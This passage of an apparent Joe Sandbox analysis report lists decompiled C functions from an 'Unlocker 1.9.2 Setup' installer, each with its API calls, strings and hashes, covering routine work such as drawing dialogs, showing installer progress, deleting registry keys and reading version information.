                                                                                                                                                              					_v16.lbStyle = _t49[2];
                                                                                                                                                              					_t40 = _t49[3];
                                                                                                                                                              					if(_t40 != 0) {
                                                                                                                                                              						DeleteObject(_t40);
                                                                                                                                                              					}
                                                                                                                                                              					_t49[3] = CreateBrushIndirect( &_v16);
                                                                                                                                                              				}
                                                                                                                                                              				return _t49[3];
                                                                                                                                                              			}









                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                                              • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                                                                              • Instruction ID: 6c7fdd900eb09a88ca35fb2207b5deae9db7ec429e3ae93f4f07cdddb38981b8
                                                                                                                                                              • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                                                                              • Instruction Fuzzy Hash: 1F219671904744ABCB219F78DD08B4B7FF8AF00715F048A2AF856E22E1C338EA04CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040464A(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				signed char _v12;
                                                                                                                                                              				unsigned int _v16;
                                                                                                                                                              				void* _v20;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				long _v56;
                                                                                                                                                              				void* _v60;
                                                                                                                                                              				long _t15;
                                                                                                                                                              				unsigned int _t19;
                                                                                                                                                              				signed int _t25;
                                                                                                                                                              				struct HWND__* _t28;
                                                                                                                                                              
                                                                                                                                                              				_t28 = _a4;
                                                                                                                                                              				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                                                                                                                              				if(_a8 == 0) {
                                                                                                                                                              					L4:
                                                                                                                                                              					_v56 = _t15;
                                                                                                                                                              					_v60 = 4;
                                                                                                                                                              					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                                                                                                                              					return _v24;
                                                                                                                                                              				}
                                                                                                                                                              				_t19 = GetMessagePos();
                                                                                                                                                              				_v16 = _t19 >> 0x10;
                                                                                                                                                              				_v20 = _t19;
                                                                                                                                                              				ScreenToClient(_t28,  &_v20);
                                                                                                                                                              				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                                                                                                                              				if((_v12 & 0x00000066) != 0) {
                                                                                                                                                              					_t15 = _v8;
                                                                                                                                                              					goto L4;
                                                                                                                                                              				}
                                                                                                                                                              				return _t25 | 0xffffffff;
                                                                                                                                                              			}















                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404665
                                                                                                                                                              • GetMessagePos.USER32 ref: 0040466D
                                                                                                                                                              • ScreenToClient.USER32 ref: 00404687
                                                                                                                                                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404699
                                                                                                                                                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004046BF
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                                              • String ID: f
                                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                                              • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                                                                              • Instruction ID: 811e074b116e6ce6d11e192741490be2760717d42b69e64a674173994bb84636
                                                                                                                                                              • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                                                                              • Instruction Fuzzy Hash: 4E014C71D00219BADB00DBA4DC85FFEBBB8AB59711F10052ABA00B61D0D7B8A9058BA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00402B3B(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                                                              				char _v68;
                                                                                                                                                              				int _t11;
                                                                                                                                                              				int _t20;
                                                                                                                                                              
                                                                                                                                                              				if(_a8 == 0x110) {
                                                                                                                                                              					SetTimer(_a4, 1, 0xfa, 0);
                                                                                                                                                              					_a8 = 0x113;
                                                                                                                                                              				}
                                                                                                                                                              				if(_a8 == 0x113) {
                                                                                                                                                              					_t20 =  *0x40b018; // 0x10753b
                                                                                                                                                              					_t11 =  *0x41f028; // 0x10753f
                                                                                                                                                              					if(_t20 >= _t11) {
                                                                                                                                                              						_t20 = _t11;
                                                                                                                                                              					}
                                                                                                                                                              					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                                                                                                                              					SetWindowTextA(_a4,  &_v68);
                                                                                                                                                              					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                                                                                                                              				}
                                                                                                                                                              				return 0;
                                                                                                                                                              			}







                                                                                                                                                              APIs
                                                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
                                                                                                                                                              • MulDiv.KERNEL32(0010753B,00000064,0010753F), ref: 00402B81
                                                                                                                                                              • wsprintfA.USER32 ref: 00402B91
                                                                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00402BA1
                                                                                                                                                              • SetDlgItemTextA.USER32 ref: 00402BB3
                                                                                                                                                              Strings
                                                                                                                                                              • verifying installer: %d%%, xrefs: 00402B8B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                              • String ID: verifying installer: %d%%
                                                                                                                                                              • API String ID: 1451636040-82062127
                                                                                                                                                              • Opcode ID: 942454595b55506ed27eeb1e7d8b1282508b27149c9d2e8fb24462be395a0e5b
                                                                                                                                                              • Instruction ID: e41715c37a5330c5740685503c003044c4943c79b663b03d39d41db920bc543d
                                                                                                                                                              • Opcode Fuzzy Hash: 942454595b55506ed27eeb1e7d8b1282508b27149c9d2e8fb24462be395a0e5b
                                                                                                                                                              • Instruction Fuzzy Hash: 34014470A00209ABDB249F60DD09EAE3779AB04345F008039FA16B92D1D7B49A559F99
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 67%
                                                                                                                                                              			E00401D1B() {
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				int _t6;
                                                                                                                                                              				signed char _t11;
                                                                                                                                                              				struct HFONT__* _t14;
                                                                                                                                                              				void* _t18;
                                                                                                                                                              				void* _t24;
                                                                                                                                                              				void* _t26;
                                                                                                                                                              				void* _t28;
                                                                                                                                                              
                                                                                                                                                              				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
                                                                                                                                                              				0x40af54->lfHeight =  ~(MulDiv(E004029D9(2), _t6, 0x48));
                                                                                                                                                              				 *0x40af64 = E004029D9(3);
                                                                                                                                                              				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                                                                                                                                                              				 *0x40af6b = 1;
                                                                                                                                                              				 *0x40af68 = _t11 & 0x00000001;
                                                                                                                                                              				 *0x40af69 = _t11 & 0x00000002;
                                                                                                                                                              				 *0x40af6a = _t11 & 0x00000004;
                                                                                                                                                              				E004059FF(_t18, _t24, _t26, "MS Shell Dlg",  *((intOrPtr*)(_t28 - 0x20)));
                                                                                                                                                              				_t14 = CreateFontIndirectA(0x40af54);
                                                                                                                                                              				_push(_t14);
                                                                                                                                                              				_push(_t26);
                                                                                                                                                              				E0040593B();
                                                                                                                                                              				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t28 - 4));
                                                                                                                                                              				return 0;
                                                                                                                                                              			}












                                                                                                                                                              APIs
                                                                                                                                                              • GetDC.USER32(?), ref: 00401D22
                                                                                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                                                                                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                                                                                                                              • CreateFontIndirectA.GDI32(0040AF54), ref: 00401D8A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CapsCreateDeviceFontIndirect
                                                                                                                                                              • String ID: MS Shell Dlg
                                                                                                                                                              • API String ID: 3272661963-76309092
                                                                                                                                                              • Opcode ID: aaa704804153b4156d33932d66762c168f337da226587c5d1751100b1e088207
                                                                                                                                                              • Instruction ID: 822a585a95499be2ccb46a886614a983d19f7779af01092212c1c8a44adbdb5d
                                                                                                                                                              • Opcode Fuzzy Hash: aaa704804153b4156d33932d66762c168f337da226587c5d1751100b1e088207
                                                                                                                                                              • Instruction Fuzzy Hash: 80F04FF1A49742AEE70167B0AE0AB9A3B659719306F14043AF242BA1E2C5BC0454DB7F
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                              			E00402A36(void* _a4, char* _a8, long _a12) {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				char _v272;
                                                                                                                                                              				signed char _t16;
                                                                                                                                                              				long _t18;
                                                                                                                                                              				long _t25;
                                                                                                                                                              				intOrPtr* _t27;
                                                                                                                                                              				long _t28;
                                                                                                                                                              
                                                                                                                                                              				_t16 =  *0x423f30; // 0x100
                                                                                                                                                              				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
                                                                                                                                                              				if(_t18 == 0) {
                                                                                                                                                              					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                                                                                                                              						__eflags = _a12;
                                                                                                                                                              						if(_a12 != 0) {
                                                                                                                                                              							RegCloseKey(_v8);
                                                                                                                                                              							L8:
                                                                                                                                                              							__eflags = 1;
                                                                                                                                                              							return 1;
                                                                                                                                                              						}
                                                                                                                                                              						_t25 = E00402A36(_v8,  &_v272, 0);
                                                                                                                                                              						__eflags = _t25;
                                                                                                                                                              						if(_t25 != 0) {
                                                                                                                                                              							break;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					RegCloseKey(_v8);
                                                                                                                                                              					_t27 = E00405CFF(2);
                                                                                                                                                              					if(_t27 == 0) {
                                                                                                                                                              						__eflags =  *0x423f30; // 0x100
                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                              							goto L8;
                                                                                                                                                              						}
                                                                                                                                                              						_t28 = RegDeleteKeyA(_a4, _a8);
                                                                                                                                                              						__eflags = _t28;
                                                                                                                                                              						if(_t28 != 0) {
                                                                                                                                                              							goto L8;
                                                                                                                                                              						}
                                                                                                                                                              						return _t28;
                                                                                                                                                              					}
                                                                                                                                                              					return  *_t27(_a4, _a8,  *0x423f30, 0);
                                                                                                                                                              				}
                                                                                                                                                              				return _t18;
                                                                                                                                                              			}











                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000100,?), ref: 00402A57
                                                                                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402A9C
                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402AC1
                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1912718029-0
                                                                                                                                                              • Opcode ID: 32cdae671697de7973d8bb2633bc31189b6b536a9ce7c2939538a07c10ae524a
                                                                                                                                                              • Instruction ID: 582bceb6e4b24316922a1ee6e85d565da044e62c79b522cd3b8563d0d5e38007
                                                                                                                                                              • Opcode Fuzzy Hash: 32cdae671697de7973d8bb2633bc31189b6b536a9ce7c2939538a07c10ae524a
                                                                                                                                                              • Instruction Fuzzy Hash: E7111771A10049BEEF31AF90DE49DAF7B7DEB44345B104036F906A10A0DBB49E51AF69
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00401CC1(int __edx) {
                                                                                                                                                              				void* _t17;
                                                                                                                                                              				struct HINSTANCE__* _t21;
                                                                                                                                                              				struct HWND__* _t25;
                                                                                                                                                              				void* _t27;
                                                                                                                                                              
                                                                                                                                                              				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
                                                                                                                                                              				GetClientRect(_t25, _t27 - 0x40);
                                                                                                                                                              				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029F6(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                                                                                                                                                              				if(_t17 != _t21) {
                                                                                                                                                              					DeleteObject(_t17);
                                                                                                                                                              				}
                                                                                                                                                              				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t27 - 4));
                                                                                                                                                              				return 0;
                                                                                                                                                              			}








                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32 ref: 00401CC5
                                                                                                                                                              • GetClientRect.USER32 ref: 00401CD2
                                                                                                                                                              • LoadImageA.USER32 ref: 00401CF3
                                                                                                                                                              • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401D10
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                                              • Opcode ID: aab1ff915591a61a6dff0f8bf18086dee3b735981cb00012526b248d1bc18b45
                                                                                                                                                              • Instruction ID: c9eade559dcb8dabe12f7fb8fefc2ecb3bb817c4e851fb83d30c8e131ed4808d
                                                                                                                                                              • Opcode Fuzzy Hash: aab1ff915591a61a6dff0f8bf18086dee3b735981cb00012526b248d1bc18b45
                                                                                                                                                              • Instruction Fuzzy Hash: B5F01DB2E04105BFD700EFA4EE89DAFB7BDEB44345B104576F602F2190C6789D018B69
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004037EF(void* __ecx, void* __eflags) {
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				signed short _t6;
                                                                                                                                                              				intOrPtr _t11;
                                                                                                                                                              				signed int _t13;
                                                                                                                                                              				intOrPtr _t15;
                                                                                                                                                              				signed int _t16;
                                                                                                                                                              				signed short* _t18;
                                                                                                                                                              				signed int _t20;
                                                                                                                                                              				signed short* _t23;
                                                                                                                                                              				intOrPtr _t25;
                                                                                                                                                              				signed int _t26;
                                                                                                                                                              				intOrPtr* _t27;
                                                                                                                                                              
                                                                                                                                                              				_t24 = "1033";
                                                                                                                                                              				_t13 = 0xffff;
                                                                                                                                                              				_t6 = E00405954(__ecx, "1033");
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t26 =  *0x423ec4; // 0x2c
                                                                                                                                                              					if(_t26 == 0) {
                                                                                                                                                              						goto L7;
                                                                                                                                                              					}
                                                                                                                                                              					_t15 =  *0x423e90; // 0x73eeb0
                                                                                                                                                              					_t16 =  *(_t15 + 0x64);
                                                                                                                                                              					_t20 =  ~_t16;
                                                                                                                                                              					_t18 = _t16 * _t26 +  *0x423ec0;
                                                                                                                                                              					while(1) {
                                                                                                                                                              						_t18 = _t18 + _t20;
                                                                                                                                                              						_t26 = _t26 - 1;
                                                                                                                                                              						if((( *_t18 ^ _t6) & _t13) == 0) {
                                                                                                                                                              							break;
                                                                                                                                                              						}
                                                                                                                                                              						if(_t26 != 0) {
                                                                                                                                                              							continue;
                                                                                                                                                              						}
                                                                                                                                                              						goto L7;
                                                                                                                                                              					}
                                                                                                                                                              					 *0x423660 = _t18[1];
                                                                                                                                                              					 *0x423f28 = _t18[3];
                                                                                                                                                              					_t23 =  &(_t18[5]);
                                                                                                                                                              					if(_t23 != 0) {
                                                                                                                                                              						 *0x42365c = _t23;
                                                                                                                                                              						E0040593B(_t24,  *_t18 & 0x0000ffff);
                                                                                                                                                              						SetWindowTextA( *0x420450, E004059FF(_t13, _t24, _t26, "Unlocker 1.9.2 Setup", 0xfffffffe));
                                                                                                                                                              						_t11 =  *0x423eac; // 0x7
                                                                                                                                                              						_t27 =  *0x423ea8; // 0x73f1dc
                                                                                                                                                              						if(_t11 == 0) {
                                                                                                                                                              							L15:
                                                                                                                                                              							return _t11;
                                                                                                                                                              						}
                                                                                                                                                              						_t25 = _t11;
                                                                                                                                                              						do {
                                                                                                                                                              							_t11 =  *_t27;
                                                                                                                                                              							if(_t11 != 0) {
                                                                                                                                                              								_t5 = _t27 + 0x18; // 0x73f1f4
                                                                                                                                                              								_t11 = E004059FF(_t13, _t25, _t27, _t5, _t11);
                                                                                                                                                              							}
                                                                                                                                                              							_t27 = _t27 + 0x418;
                                                                                                                                                              							_t25 = _t25 - 1;
                                                                                                                                                              						} while (_t25 != 0);
                                                                                                                                                              						goto L15;
                                                                                                                                                              					}
                                                                                                                                                              					L7:
                                                                                                                                                              					if(_t13 != 0xffff) {
                                                                                                                                                              						_t13 = 0;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t13 = 0x3ff;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              			}


















                                                                                                                                                              APIs
                                                                                                                                                              • SetWindowTextA.USER32(00000000,Unlocker 1.9.2 Setup), ref: 00403887
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: TextWindow
                                                                                                                                                              • String ID: 1033$C:\Users\user\AppData\Local\Temp\$Unlocker 1.9.2 Setup
                                                                                                                                                              • API String ID: 530164218-2643474798
                                                                                                                                                              • Opcode ID: 2885b835fa9f6124610e1a5c6837e8d1ea9164dd69e17ca9c0250379504c76d4
                                                                                                                                                              • Instruction ID: 1abde7c3b4d11e9a2e55591403c44a3397e590d434b7b54f33d2a439c9831bdd
                                                                                                                                                              • Opcode Fuzzy Hash: 2885b835fa9f6124610e1a5c6837e8d1ea9164dd69e17ca9c0250379504c76d4
                                                                                                                                                              • Instruction Fuzzy Hash: 0711C276B002119BC730AF55D8809377BADEF4471631981BFE80167390C73D9E028B98
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004054D0(CHAR* _a4) {
                                                                                                                                                              				CHAR* _t7;
                                                                                                                                                              
                                                                                                                                                              				_t7 = _a4;
                                                                                                                                                              				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                                                                                                              					lstrcatA(_t7, 0x409010);
                                                                                                                                                              				}
                                                                                                                                                              				return _t7;
                                                                                                                                                              			}





                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030B5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004054D6
                                                                                                                                                              • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030B5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004054DF
                                                                                                                                                              • lstrcatA.KERNEL32(?,00409010), ref: 004054F0
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004054D0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                              • API String ID: 2659869361-3081826266
                                                                                                                                                              • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                                                                              • Instruction ID: 18d73bba3a4f2c077241afd2b81ba446c35da1b9bd2d8ef2eba9fb39a34af30a
                                                                                                                                                              • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                                                                              • Instruction Fuzzy Hash: 09D0A7B2505970AED20126195C05FCF2A08CF023117044423F640B21D2C63C5C819BFD
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E00401EC5(char __ebx, char* __edi, char* __esi) {
                                                                                                                                                              				char* _t18;
                                                                                                                                                              				int _t19;
                                                                                                                                                              				void* _t30;
                                                                                                                                                              
                                                                                                                                                              				_t18 = E004029F6(0xffffffee);
                                                                                                                                                              				 *(_t30 - 0x2c) = _t18;
                                                                                                                                                              				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
                                                                                                                                                              				 *__esi = __ebx;
                                                                                                                                                              				 *(_t30 - 8) = _t19;
                                                                                                                                                              				 *__edi = __ebx;
                                                                                                                                                              				 *((intOrPtr*)(_t30 - 4)) = 1;
                                                                                                                                                              				if(_t19 != __ebx) {
                                                                                                                                                              					__eax = GlobalAlloc(0x40, __eax);
                                                                                                                                                              					 *(__ebp + 8) = __eax;
                                                                                                                                                              					if(__eax != __ebx) {
                                                                                                                                                              						if(__eax != 0) {
                                                                                                                                                              							__ebp - 0x44 = __ebp - 0x34;
                                                                                                                                                              							if(VerQueryValueA( *(__ebp + 8), 0x409010, __ebp - 0x34, __ebp - 0x44) != 0) {
                                                                                                                                                              								 *(__ebp - 0x34) = E0040593B(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
                                                                                                                                                              								 *(__ebp - 0x34) = E0040593B(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
                                                                                                                                                              								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						_push( *(__ebp + 8));
                                                                                                                                                              						GlobalFree();
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t30 - 4));
                                                                                                                                                              				return 0;
                                                                                                                                                              			}







                                                                                                                                                              APIs
                                                                                                                                                              • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
